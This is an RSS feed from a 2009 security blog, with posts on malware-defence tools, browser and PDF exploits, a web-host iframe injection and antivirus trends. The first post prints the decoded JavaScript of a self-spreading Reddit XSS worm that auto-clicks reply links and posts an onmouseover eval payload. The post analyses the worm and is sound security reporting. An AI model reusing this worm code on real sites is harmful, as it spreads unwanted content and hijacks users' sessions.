<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>insanesecurity &#187; Malware</title>
	<atom:link href="http://insanesecurity.info/blog/tag/malware/feed" rel="self" type="application/rss+xml" />
	<link>http://insanesecurity.info/blog</link>
	<description>security through a distorted eye</description>
	<lastBuildDate>Thu, 25 Feb 2010 22:31:12 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>Reddit worm, oh boy&#8230;</title>
		<link>http://insanesecurity.info/blog/reddit-worm-oh-my</link>
		<comments>http://insanesecurity.info/blog/reddit-worm-oh-my#comments</comments>
		<pubDate>Mon, 28 Sep 2009 04:03:42 +0000</pubDate>
		<dc:creator>dblackshell</dc:creator>
				<category><![CDATA[Code]]></category>
		<category><![CDATA[How To]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[Javascript]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Worm]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://insanesecurity.info/blog/?p=264</guid>
		<description><![CDATA[As I am writing this a javascript worm is having fun spreading on reddit. For one part we should be happy it only spreads and does not do anything else (you now, like cookie theft). On the other hand, it may be an attempt to DDoS reddit, because I&#8217;m suddenly starting to get error pages&#8230; [...]]]></description>
			<content:encoded><![CDATA[<p>As I am writing this a javascript worm is having fun spreading on reddit. For one part we should be happy it only spreads and does not do anything else (you now, like cookie theft). On the other hand, it may be an attempt to DDoS reddit, because I&#8217;m suddenly starting to get error pages&#8230;<br />
<code><br />
An error occurred while processing your request.<br />
Reference #97.27c37259.1254106488.35b1d0e<br />
</code></p>
<p>The (decoded) code of the worm is the following:</p>
<pre>
// generate payload/attack vector
// having trouble understanding why this works

z="[x][b]\n[b]:/["+this.innerHTML+"](/onmouseover=eval(unescape(this.innerHTML9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d//)";

// and what's with the 9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d ?

// "click" all reply links in page
o=document;
e=o.getElementsByTagName('a');
for(i=0;i&lt;e.length;i++)
    if(e[i].innerHTML=='reply')
        $(e[i]).click();

// fill with payload
o=document;
e=o.getElementsByTagName('textarea');
for(i=0;i&lt;e.length;i++)
    e[i].value=z;

// submit
e=o.getElementsByTagName('button');
for(i=0;i&lt;e.length;i++)
    if(e[i].innerHTML=='save'&#038;&#038;e[i].style.display!='none')
        $(e[i]).click();
</pre>
<p>In the meantime of writing the article I tried to look for the invalid filtering in the source code, but as touching for the first time the code had no sense of direction. If someone would be kind enough to enlighten me in which file the code resides I&#8217;d be more than happy.</p>
<p>If not, we&#8217;ll have an unsolved mystery :)</p>
<p><strong>UPDATE</strong>: worm author has happily <a href="http://www.reddit.com/r/IAmA/comments/9ox75/i_found_and_wrote_the_exploit_which_crashed/c0dqwzs">shared its way of evading the filter</a>.</p>
<p><strong>UPDATE 2</strong>: <a href="http://blog.reddit.com/2009/09/we-had-some-bugs-and-it-hurt-us.html">post about the bug on the reddit blog</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://insanesecurity.info/blog/reddit-worm-oh-my/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Malware: a common threat</title>
		<link>http://insanesecurity.info/blog/malware-a-common-threat-2</link>
		<comments>http://insanesecurity.info/blog/malware-a-common-threat-2#comments</comments>
		<pubDate>Wed, 24 Jun 2009 16:45:53 +0000</pubDate>
		<dc:creator>dblackshell</dc:creator>
				<category><![CDATA[Research]]></category>
		<category><![CDATA[Toolbox]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Userscript]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://insanesecurity.info/blog/?p=69</guid>
		<description><![CDATA[Malware represents a common threat for all users out there surfing the web. It doesn&#8217;t have ethics or a message to spread, like viruses used to have (not all had dangerous payloads). Another thing about malware, as I pointed it out in my article about the AV industry, they tend to use the same code [...]]]></description>
			<content:encoded><![CDATA[<p>Malware represents a common threat for all users out there surfing the web. It doesn&#8217;t have ethics or a message to spread, like viruses used to have (not all had dangerous payloads).</p>
<p><span id="more-69"></span></p>
<p>
Another thing about malware, as I pointed it out in my article <a href="http://insanesecurity.info/2009/01/the-future-of-av-or-not/">about the AV industry</a>, they tend to use the same code with minor modification; to be read as strains. If you&#8217;re new to this term (Malware), then I would recommend you an introductive article: <a href="http://www.atmaxplorer.com/2007/12/protect-yourself-from-malware/">Stop malware in it&#8217;s tracks</a>.</p>
<p>Following the <a href="http://www.f-secure.com/weblog/archives/00001579.html">latest article on F-Secure</a> Downadup has <span class="rss:item"><strong>2,395,963</strong> infections worldwide. Of course this is an optimistic scenario, even for a skeptic person at numbers as I am. You can see now the big threat that malware posses, that&#8217;s why we should protect ourselves&#8230;</span><br />
<script type="text/javascript"><!--
google_ad_client = "pub-4879499347590889";
/* 468x60, created 1/22/09 */
google_ad_slot = "0361207255";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script><br />
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></p>
<h2>Greasemonkey: Malware Script Detector</h2>
<p><a href="http://sourceforge.net/projects/gmsd/">Malware Script Detector</a> is a <a href="http://www.greasespot.net/">Greasmonkey</a> script which will:</p>
<blockquote><p>Detect &amp; Alert Malicious JavaScript : XSSProxy, XSS-Shell, AttackAPI, Beef. But No guarantee for full prevention of  XSS-Injection threats. Many ways to bypass it such as via iframes but I&#8217;m sure it protects you from casual attackers.The main objective of developing Malware Script Detector is that I&#8217;m so much afraid of XSSProxy, XSS-Shell, AttackAPI, Beef and I want to detect them. Malicious sites intentionally embed them. Firefox XSS Warning addon can&#8217;t check this.</p>
</blockquote>
<p>It&#8217;s a highly recommended script, because malware scripts can be as dangerous as normal malware. The difference is that normal malware posses little threat if you download software from official sources, and verify the checksum&#8230;</p>
<h2>Malware Blocker</h2>
<p><a href="http://sourceforge.net/projects/malwareblocker/">Malware Blocker</a> is a tool useful before and after infection. The description of the program (as taken from SourceForge):</p>
<blockquote><p>Malware-Blocker blocks communication from your computer to any server that is known to be a malicious one. It does that by replacing your HOSTS file (deep inside Windows directory) with a blacklist of malicious servers, which are redirected to 0.0.0.0</p>
</blockquote>
<p>The projects last update is from February 2005. Although likely outdated it maintains a constant number of downloads, this being the reason I recommend it. Who knows what funky old school malware will you cross upon one day&#8230;<br />
<script type="text/javascript"><!--
google_ad_client = "pub-4879499347590889";
/* 468x60, created 1/22/09 */
google_ad_slot = "0361207255";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script><br />
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></p>
<h2>MalZilla</h2>
<p>This is an unexpected turn, is it? First of all you would probably like to know what <a href="http://sourceforge.net/projects/malzilla/">MalZilla</a> is. In simple words:</p>
<blockquote><p>Malzilla is an advanced malware-hunting tool specialized for hunting web-based exploits, decode obfuscated JavaScripts etc.</p>
</blockquote>
<p>Although limited only for malware scripts I can guaranty you that its very good at it, giving you all the tools needed for such a task. More information in it&#8217;s own pdf file, which comes along with the package.</p>
<p>Most of you can ignore the last application presented, I would think that having the first two installed is more than enough for regular users. And no, it&#8217;s not dangerous playing with malware if you got the proper tools.</p>
]]></content:encoded>
			<wfw:commentRss>http://insanesecurity.info/blog/malware-a-common-threat-2/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Exploit Shield</title>
		<link>http://insanesecurity.info/blog/exploit-shield</link>
		<comments>http://insanesecurity.info/blog/exploit-shield#comments</comments>
		<pubDate>Wed, 24 Jun 2009 16:35:20 +0000</pubDate>
		<dc:creator>dblackshell</dc:creator>
				<category><![CDATA[Toolbox]]></category>
		<category><![CDATA[AV]]></category>
		<category><![CDATA[Firefox]]></category>
		<category><![CDATA[IE]]></category>
		<category><![CDATA[Malware]]></category>

		<guid isPermaLink="false">http://insanesecurity.info/blog/exploit-shield</guid>
		<description><![CDATA[An exploit (from the same word in the French language, meaning &#8220;achievement&#8221;, or &#8220;accomplishment&#8221;) is a piece of software, a chunk of data, or sequence of commands that take advantage of a bug, glitch or vulnerability in order to cause unintended or unanticipated behavior to occur on computer software, hardware, or something electronic (usually computerized). [...]]]></description>
			<content:encoded><![CDATA[<p>An exploit (from the same word in the French language, meaning &#8220;achievement&#8221;, or &#8220;accomplishment&#8221;) is a piece of software, a chunk of data, or sequence of commands that take advantage of a bug, glitch or vulnerability in order to cause unintended or unanticipated behavior to occur on computer software, hardware, or something electronic (usually computerized). This frequently includes such things as violently gaining control of a computer system or allowing privilege escalation or a denial of service attack. (<a href="http://en.wikipedia.org/wiki/Exploit_(computer_security)">Wikipedia</a>)</p>
<p><span id="more-62"></span></p>
<p>
Eleven days ago Microsoft did a disclosure on the <a href="http://www.microsoft.com/technet/security/Bulletin/MS09-002.mspx">MS09-002</a>. Seven days later we already had a <a href="http://isc.sans.org/diary.html?storyid=5884">proof of concept</a> that was used in the wild, and today having even the <a href="http://thewifihack.com/blog/?p=343">Metasploit exploit</a>.</p>
<p>Eleven days have passed, did you patch the vulnerability? Most of the users will not have it patched too soon, even if it comes with the automatic updates. Many just simply have automatic updates turned off. Even so, there are some patches which take a long time to be released, for example the <a href="http://www.microsoft.com/technet/security/bulletin/ms08-078.mspx">MS08-078</a> patch did take a while to be released.<br />
<script type="text/javascript"><!--
google_ad_client = "pub-4879499347590889";
/* 468x60, created 1/22/09 */
google_ad_slot = "0361207255";
google_ad_width = 468;
google_ad_height = 60;
// --></script></p>
<p><script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"></script></p>
<p>And here comes in <a href="http://www.f-secure.com/weblog/archives/00001607.html">Exploit Shield</a> an application which will protect your from browser based exploits (either IE or Firefox), but don&#8217;t over trust it, as soon as a patch comes out you should fix the vulnerability.</p>
<blockquote><p>Exploit Shield is designed to shield Web browsers between the development of an exploit and the release of the vendor&#8217;s patch.</p>
</blockquote>
<p>Exploit Shield posses the following functionality: Zero Day Defense, Patch-Equivalent Protection, Proactive Measures, Protects Against All Websites and Automatic Feedback.</p>
<p>But does it work? Of course it does, check out the <a href="http://www.f-secure.com/weblog/archives/00001608.html">detection of a MS09-002 based exploit</a> which was catched by the heuristics incorporated in the software.</p>
<p>It&#8217;s also a program that would be useful when researching/coding such exploits, although the automatic submission should be disabled in that case (*grin*).</p>
<p>If you haven&#8217;t got it yet, you can download it from <a href="http://support.f-secure.com/beta/estp/estp.shtml">here</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://insanesecurity.info/blog/exploit-shield/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Adobe Reader may doom you</title>
		<link>http://insanesecurity.info/blog/adobe-reader-may-doom-you</link>
		<comments>http://insanesecurity.info/blog/adobe-reader-may-doom-you#comments</comments>
		<pubDate>Wed, 24 Jun 2009 16:32:17 +0000</pubDate>
		<dc:creator>dblackshell</dc:creator>
				<category><![CDATA[Research]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://insanesecurity.info/blog/adobe-reader-may-doom-you</guid>
		<description><![CDATA[In the last period of time malware authors started focusing more and more on exploiting Adobe Reader (and ultimately users computers) via maliciously crafted documents. And vulnerabilities in Adobe Reader have been quite a few lately. Adobe Reader oriented attack was also the malicious injection on my last hosting service&#8230; In the recent issue of [...]]]></description>
			<content:encoded><![CDATA[<p>In the last period of time malware authors started focusing more and more on exploiting Adobe Reader (and ultimately users computers) via maliciously crafted documents. And <a href="http://search.securityfocus.com/swsearch?query=adobe+reader&#038;sbm=%2F&#038;submit=Search!&#038;metaname=alldoc&#038;sort=swishlastmodified">vulnerabilities in Adobe Reader</a> have been quite a few lately.</p>
<p>Adobe Reader oriented attack was also the <a href="http://insanesecurity.info/blog/our-little-chinese-friend">malicious injection on my last hosting</a> service&#8230;<br />
<span id="more-60"></span><br />
In the recent issue of (in)SECURE Magazine, namely <a href="http://www.net-security.org/dl/insecure/INSECURE-Mag-21.pdf">issue 21</a>, there is an article named &#8220;Malicious PDF: Get owned without opening&#8221; by <a href="http://twitter.com/didierstevens">Didier Stevens</a> which shown an exploit in an Adobe Reader filter which made possible successful exploitation without file opening.</p>
<blockquote><p>When a PDF document is listed in a Windows Explorer window, the PDF column handler shell extension will be called by Windows Explorer when it needs the additional column info. The PDF column handler will read the PDF document to extract the necessary info, like the Title, Author, etc. (&#8230;) Under the right circumstances, a Windows Explorer Shell Extension will read the PDF document to provide extra information, and in doing so, it will execute the buggy code and trigger the vulnerability</p>
</blockquote>
<p>Other ways how the exploit could be launched (from the explorer window) where by: selecting the pdf (left click), hovering over it and changing the folder view to &#8220;Thumbnail&#8221;.<br />
<script type="text/javascript"><!--
google_ad_client = "pub-4879499347590889";
/* 468x60, created 1/22/09 */
google_ad_slot = "0361207255";
google_ad_width = 468;
google_ad_height = 60;
// --></script><br />
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"></script><br />
All these previous exploitation scenarios required minimal user interaction, but the author had another card in his pocket. The JBIG2Decode vulnerability could be exploited by the Windows Indexing Service alone, the only difference being that this way the exploit would run with less privileges; namely with Local System ones&#8230;</p>
<p>There you have it, another reason to switch to a pdf reader alternative.</p>
<p><strong>UPDATE:</strong> a resourceful article about pdf exploitation can be found <a href="http://carnal0wnage.attackresearch.com/node/362">here</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://insanesecurity.info/blog/adobe-reader-may-doom-you/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Our little chinese friend…</title>
		<link>http://insanesecurity.info/blog/our-little-chinese-friend</link>
		<comments>http://insanesecurity.info/blog/our-little-chinese-friend#comments</comments>
		<pubDate>Wed, 24 Jun 2009 16:29:26 +0000</pubDate>
		<dc:creator>dblackshell</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Malware]]></category>

		<guid isPermaLink="false">http://insanesecurity.info/blog/?p=56</guid>
		<description><![CDATA[As you may have seen, in the last couple of days this blog was inactive, or under movement&#8230; All this happened due to a possible attack on my last hosting provider. And I said possible because I imagined multiple scenarios in which it could have happened. You&#8217;re not my friend! At first, when I saw [...]]]></description>
			<content:encoded><![CDATA[<p>As you may have seen, in the last couple of days this blog was inactive, or under movement&#8230; All this happened due to a possible attack on my last hosting provider. And I said possible because I imagined multiple scenarios in which it could have happened.
</p>
<p><span id="more-56"></span></p>
<h2>You&#8217;re not my friend!</h2>
<p>At first, when I saw maliciously injected iframes in the my websites I thought it may have been a targeted attack. Some reasons why I supposed this was due to the reason that other websites found on the same IP weren&#8217;t affected, or at least that was the way it looked at first. This wouldn&#8217;t have been so weird because I (and my coworker) manage these websites, and he stores the passwords in the ftp clients he uses, having no antivirus (that had to be mentioned).</p>
<p>After more lurking on more websites that have been on the same IP address I&#8217;ve came across other infected ones&#8230; So my first theory was dismissed, along with the pleasure that I would had if blamed my college.</p>
<h2>WordPress, is that you?</h2>
<p>The second thing I suspected was some wordpress plugin, because almost all those that were infected had wordpress on them (even those that didn&#8217;t belong to us), so maybe there was some piece of PHP code in some pluggin that could have started the whole infection&#8230;</p>
<p>Downloaded a sample installation from the server and started greping it, first thing that poped up was that <em>pluggable.php</em> was also infected (forgot to mention, but the iframes where attached in <em>index.php</em> and <em>index.html</em> files)&#8230; but nothing else, so I came to my third and final scenario.</p>
<h2>It&#8217;s your fault!</h2>
<p>Given the above scenarios have been ravished my last tough was a server exploitation. So I submitted a ticked demanding some information giving this issue, which came with some poor response (and the reason I switched the hoster):</p>
<p>&#8212;<br />
<img src="http://img517.imageshack.us/img517/4325/support00.jpg" /><br />
&#8212;</p>
<p>No hard feelings, I always accept suggestions, but we where not talking only about my account (I mentioned others where affected as well), so I requested a grep on the websites; maybe they could have found if it were a local attack&#8230; but I was disappointed again:</p>
<p>&#8212;<br />
<img src="http://img207.imageshack.us/img207/8794/support01.jpg" /><br />
&#8212;</p>
<p>No, thank you, and kudos for the Chinese guy who did this&#8230; Later on I found out that <a href="http://securitylabs.websense.com/content/Alerts/3405.aspx?cmpid=sltw">mass injection compromised more than twenty-thousand web sites</a> and suspect that my former hoster may have been also under that attack.</p>
]]></content:encoded>
			<wfw:commentRss>http://insanesecurity.info/blog/our-little-chinese-friend/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Malware: a common threat</title>
		<link>http://insanesecurity.info/blog/malware-a-common-threat</link>
		<comments>http://insanesecurity.info/blog/malware-a-common-threat#comments</comments>
		<pubDate>Wed, 24 Jun 2009 05:53:39 +0000</pubDate>
		<dc:creator>dblackshell</dc:creator>
				<category><![CDATA[Research]]></category>
		<category><![CDATA[Toolbox]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Userscript]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://insanesecurity.info/blog/?p=24</guid>
		<description><![CDATA[Malware represents a common threat for all users out there surfing the web. It doesn&#8217;t have ethics or a message to spread, like viruses used to have (not all had dangerous payloads). Another thing about malware, as I pointed it out in my article about the AV industry, they tend to use the same code [...]]]></description>
			<content:encoded><![CDATA[<p>Malware represents a common threat for all users out there surfing the web. It doesn&#8217;t have ethics or a message to spread, like viruses used to have (not all had dangerous payloads).</p>
<p><span id="more-24"></span><br />
Another thing about malware, as I pointed it out in my article <a href="http://insanesecurity.info/2009/01/the-future-of-av-or-not/">about the AV industry</a>, they tend to use the same code with minor modification; to be read as strains. If you&#8217;re new to this term (Malware), then I would recommend you an introductive article: <a href="http://www.atmaxplorer.com/2007/12/protect-yourself-from-malware/">Stop malware in it&#8217;s tracks</a>.</p>
<p>Following the <a href="http://www.f-secure.com/weblog/archives/00001579.html">latest article on F-Secure</a> Downadup has <span class="rss:item"><strong>2,395,963</strong> infections worldwide. Of course this is an optimistic scenario, even for a skeptic person at numbers as I am. You can see now the big threat that malware posses, that&#8217;s why we should protect ourselves&#8230;</span><br />
<script type="text/javascript"><!--
google_ad_client = "pub-4879499347590889";
/* 468x60, created 1/22/09 */
google_ad_slot = "0361207255";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script><br />
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></p>
<h2>Greasemonkey: Malware Script Detector</h2>
<p><a href="http://sourceforge.net/projects/gmsd/">Malware Script Detector</a> is a <a href="http://www.greasespot.net/">Greasmonkey</a> script which will:</p>
<blockquote><p>Detect &amp; Alert Malicious JavaScript : XSSProxy, XSS-Shell, AttackAPI, Beef. But No guarantee for full prevention of  XSS-Injection threats. Many ways to bypass it such as via iframes but I&#8217;m sure it protects you from casual attackers.The main objective of developing Malware Script Detector is that I&#8217;m so much afraid of XSSProxy, XSS-Shell, AttackAPI, Beef and I want to detect them. Malicious sites intentionally embed them. Firefox XSS Warning addon can&#8217;t check this.</p>
</blockquote>
<p>It&#8217;s a highly recommended script, because malware scripts can be as dangerous as normal malware. The difference is that normal malware posses little threat if you download software from official sources, and verify the checksum&#8230;</p>
<h2>Malware Blocker</h2>
<p><a href="http://sourceforge.net/projects/malwareblocker/">Malware Blocker</a> is a tool useful before and after infection. The description of the program (as taken from SourceForge):</p>
<blockquote><p>Malware-Blocker blocks communication from your computer to any server that is known to be a malicious one. It does that by replacing your HOSTS file (deep inside Windows directory) with a blacklist of malicious servers, which are redirected to 0.0.0.0</p>
</blockquote>
<p>The projects last update is from February 2005. Although likely outdated it maintains a constant number of downloads, this being the reason I recommend it. Who knows what funky old school malware will you cross upon one day&#8230;<br />
<script type="text/javascript"><!--
google_ad_client = "pub-4879499347590889";
/* 468x60, created 1/22/09 */
google_ad_slot = "0361207255";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script><br />
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></p>
<h2>MalZilla</h2>
<p>This is an unexpected turn, is it? First of all you would probably like to know what <a href="http://sourceforge.net/projects/malzilla/">MalZilla</a> is. In simple words:</p>
<blockquote><p>Malzilla is an advanced malware-hunting tool specialized for hunting web-based exploits, decode obfuscated JavaScripts etc.</p>
</blockquote>
<p>Although limited only for malware scripts I can guaranty you that its very good at it, giving you all the tools needed for such a task. More information in it&#8217;s own pdf file, which comes along with the package.</p>
<p>Most of you can ignore the last application presented, I would think that having the first two installed is more than enough for regular users. And no, it&#8217;s not dangerous playing with malware if you got the proper tools.</p>
]]></content:encoded>
			<wfw:commentRss>http://insanesecurity.info/blog/malware-a-common-threat/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The future of AV, or not?</title>
		<link>http://insanesecurity.info/blog/the-future-of-av-or-not</link>
		<comments>http://insanesecurity.info/blog/the-future-of-av-or-not#comments</comments>
		<pubDate>Wed, 24 Jun 2009 05:42:30 +0000</pubDate>
		<dc:creator>dblackshell</dc:creator>
				<category><![CDATA[Discussion]]></category>
		<category><![CDATA[AV]]></category>
		<category><![CDATA[Malware]]></category>

		<guid isPermaLink="false">http://insanesecurity.info/blog/?p=11</guid>
		<description><![CDATA[Recently I read an article in the (IN)SECURE Magazine 19 entitled The Future Of AV: looking for the good while stopping the bad. After my opinion there should be more to be said about it, based on the article. Contrary to some industry observers, antivirus software is not dead. It is, however, undergoing a game-changing [...]]]></description>
			<content:encoded><![CDATA[<p>Recently I read an article in the <a href="http://www.net-security.org/dl/insecure/INSECURE-Mag-19.pdf"><strong>(IN)SECURE Magazine</strong> <strong>19</strong></a> entitled <q>The Future Of AV: looking for the good while stopping the bad</q>. After my opinion there should be more to be said about it, based on the article.<br />
<span id="more-11"></span></p>
<blockquote><p>Contrary to some industry observers, antivirus software is not dead. It is, however, undergoing a game-changing transformation.</p>
</blockquote>
<p>Here should be noted that by <q>game-changing</q> the author (<a href="http://www.symantec.com/about/news/resources/press_kits/bios/bio.jsp?bioid=carey_nachenberg">Carey Nachenberg</a>) is really saying that the antivirus software will be &#8220;antivirus&#8221; software only by name.</p>
<p>What do I mean by that? To tell you honestly I think that the VX (Virus eXchange) scene is dying slowly and only a couple, or should I say handful, of viruses/worms emerge annually. Without the virus creators, there should be no future for AV, right? Wrong!</p>
<p><script type="text/javascript"><!--
google_ad_client = "pub-4879499347590889";
/* 468x60, created 1/22/09 */
google_ad_slot = "0361207255";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script><br />
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></p>
<p>AV software for many years detects Malware (Spyware, Trojan, RAT, Rootkits?) and if it were not for the strong impact of the word <strong>Virus</strong> I would be really sure they would be called Anti-Malware.</p>
<blockquote><p>By some measurements, the volume of malicious software is now outpacing the production of legitimate programs. Symantec recently measured the adoption rate of new software<br />
applications and found that out of almost 55,000 unique applications deployed during a weeklong measurement period on Microsoft Windows PCs, 65 percent were malicious.</p>
</blockquote>
<p>This proves the fact that nowadays Malware  do the harm, not viruses. I know  some of you knew that, but it had to be said for those who didn&#8217;t.</p>
<blockquote><p>(&#8230;) attackers can easily circumvent most generic signatures by tweaking existing malware files, scanning them with an antivirus scanner, and repeating the process until the scanner no longer detects the infection. Such modifications can be<br />
done by hand or, unfortunately, all too easily via automation.</p>
</blockquote>
<p>That doesn&#8217;t sound so new, it reminds me of the first tutorial I read about making viruses undetectable. And it&#8217;s not a new either, it&#8217;s a tutorial that dates as back as 1991, called <a href="http://packetstormsecurity.org/mag/40hex/40HEX-01/40HEX-1.002">How To Modify A Virus So SCAN Won&#8217;t Catch It</a>.</p>
<blockquote><p>Clearly, in such an environment, traditional signature-based detection &#8211; or blacklisting &#8211; alone is not enough.</p>
</blockquote>
<p>You don&#8217;t say&#8230; What about heuristics, it&#8217;s been around for more than a decade, and great things can be done with it. I have in mind an AV program that implemented it quite well, but I don&#8217;t want to make from this article a promotive one.</p>
<blockquote><p>As the volume of malicious code continues to skyrocket, security techniques must increasingly focus less on analyzing malware and more on analyzing &#8220;goodware.&#8221;</p>
</blockquote>
<p>Whitelisting was, and is, always a better choice, in my opinion, than blacklisting.</p>
<blockquote><p>Similarly, it!s difficult for security companies to locate less<br />
popular, yet entirely legitimate, software applications and add them to a whitelist. Imagine a small software vendor that caters to just a handful of customers. What are the odds that this vendor!s software will be discovered and added to a whitelist in a timely fashion?</p>
</blockquote>
<p>About the same as winning the lottery.</p>
<blockquote><p>Perhaps the greatest benefit of a hybrid approach is that it would finally return the burden of antivirus protection from the shoulders of weary customers back to security vendors</p>
</blockquote>
<p>Perhaps&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://insanesecurity.info/blog/the-future-of-av-or-not/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
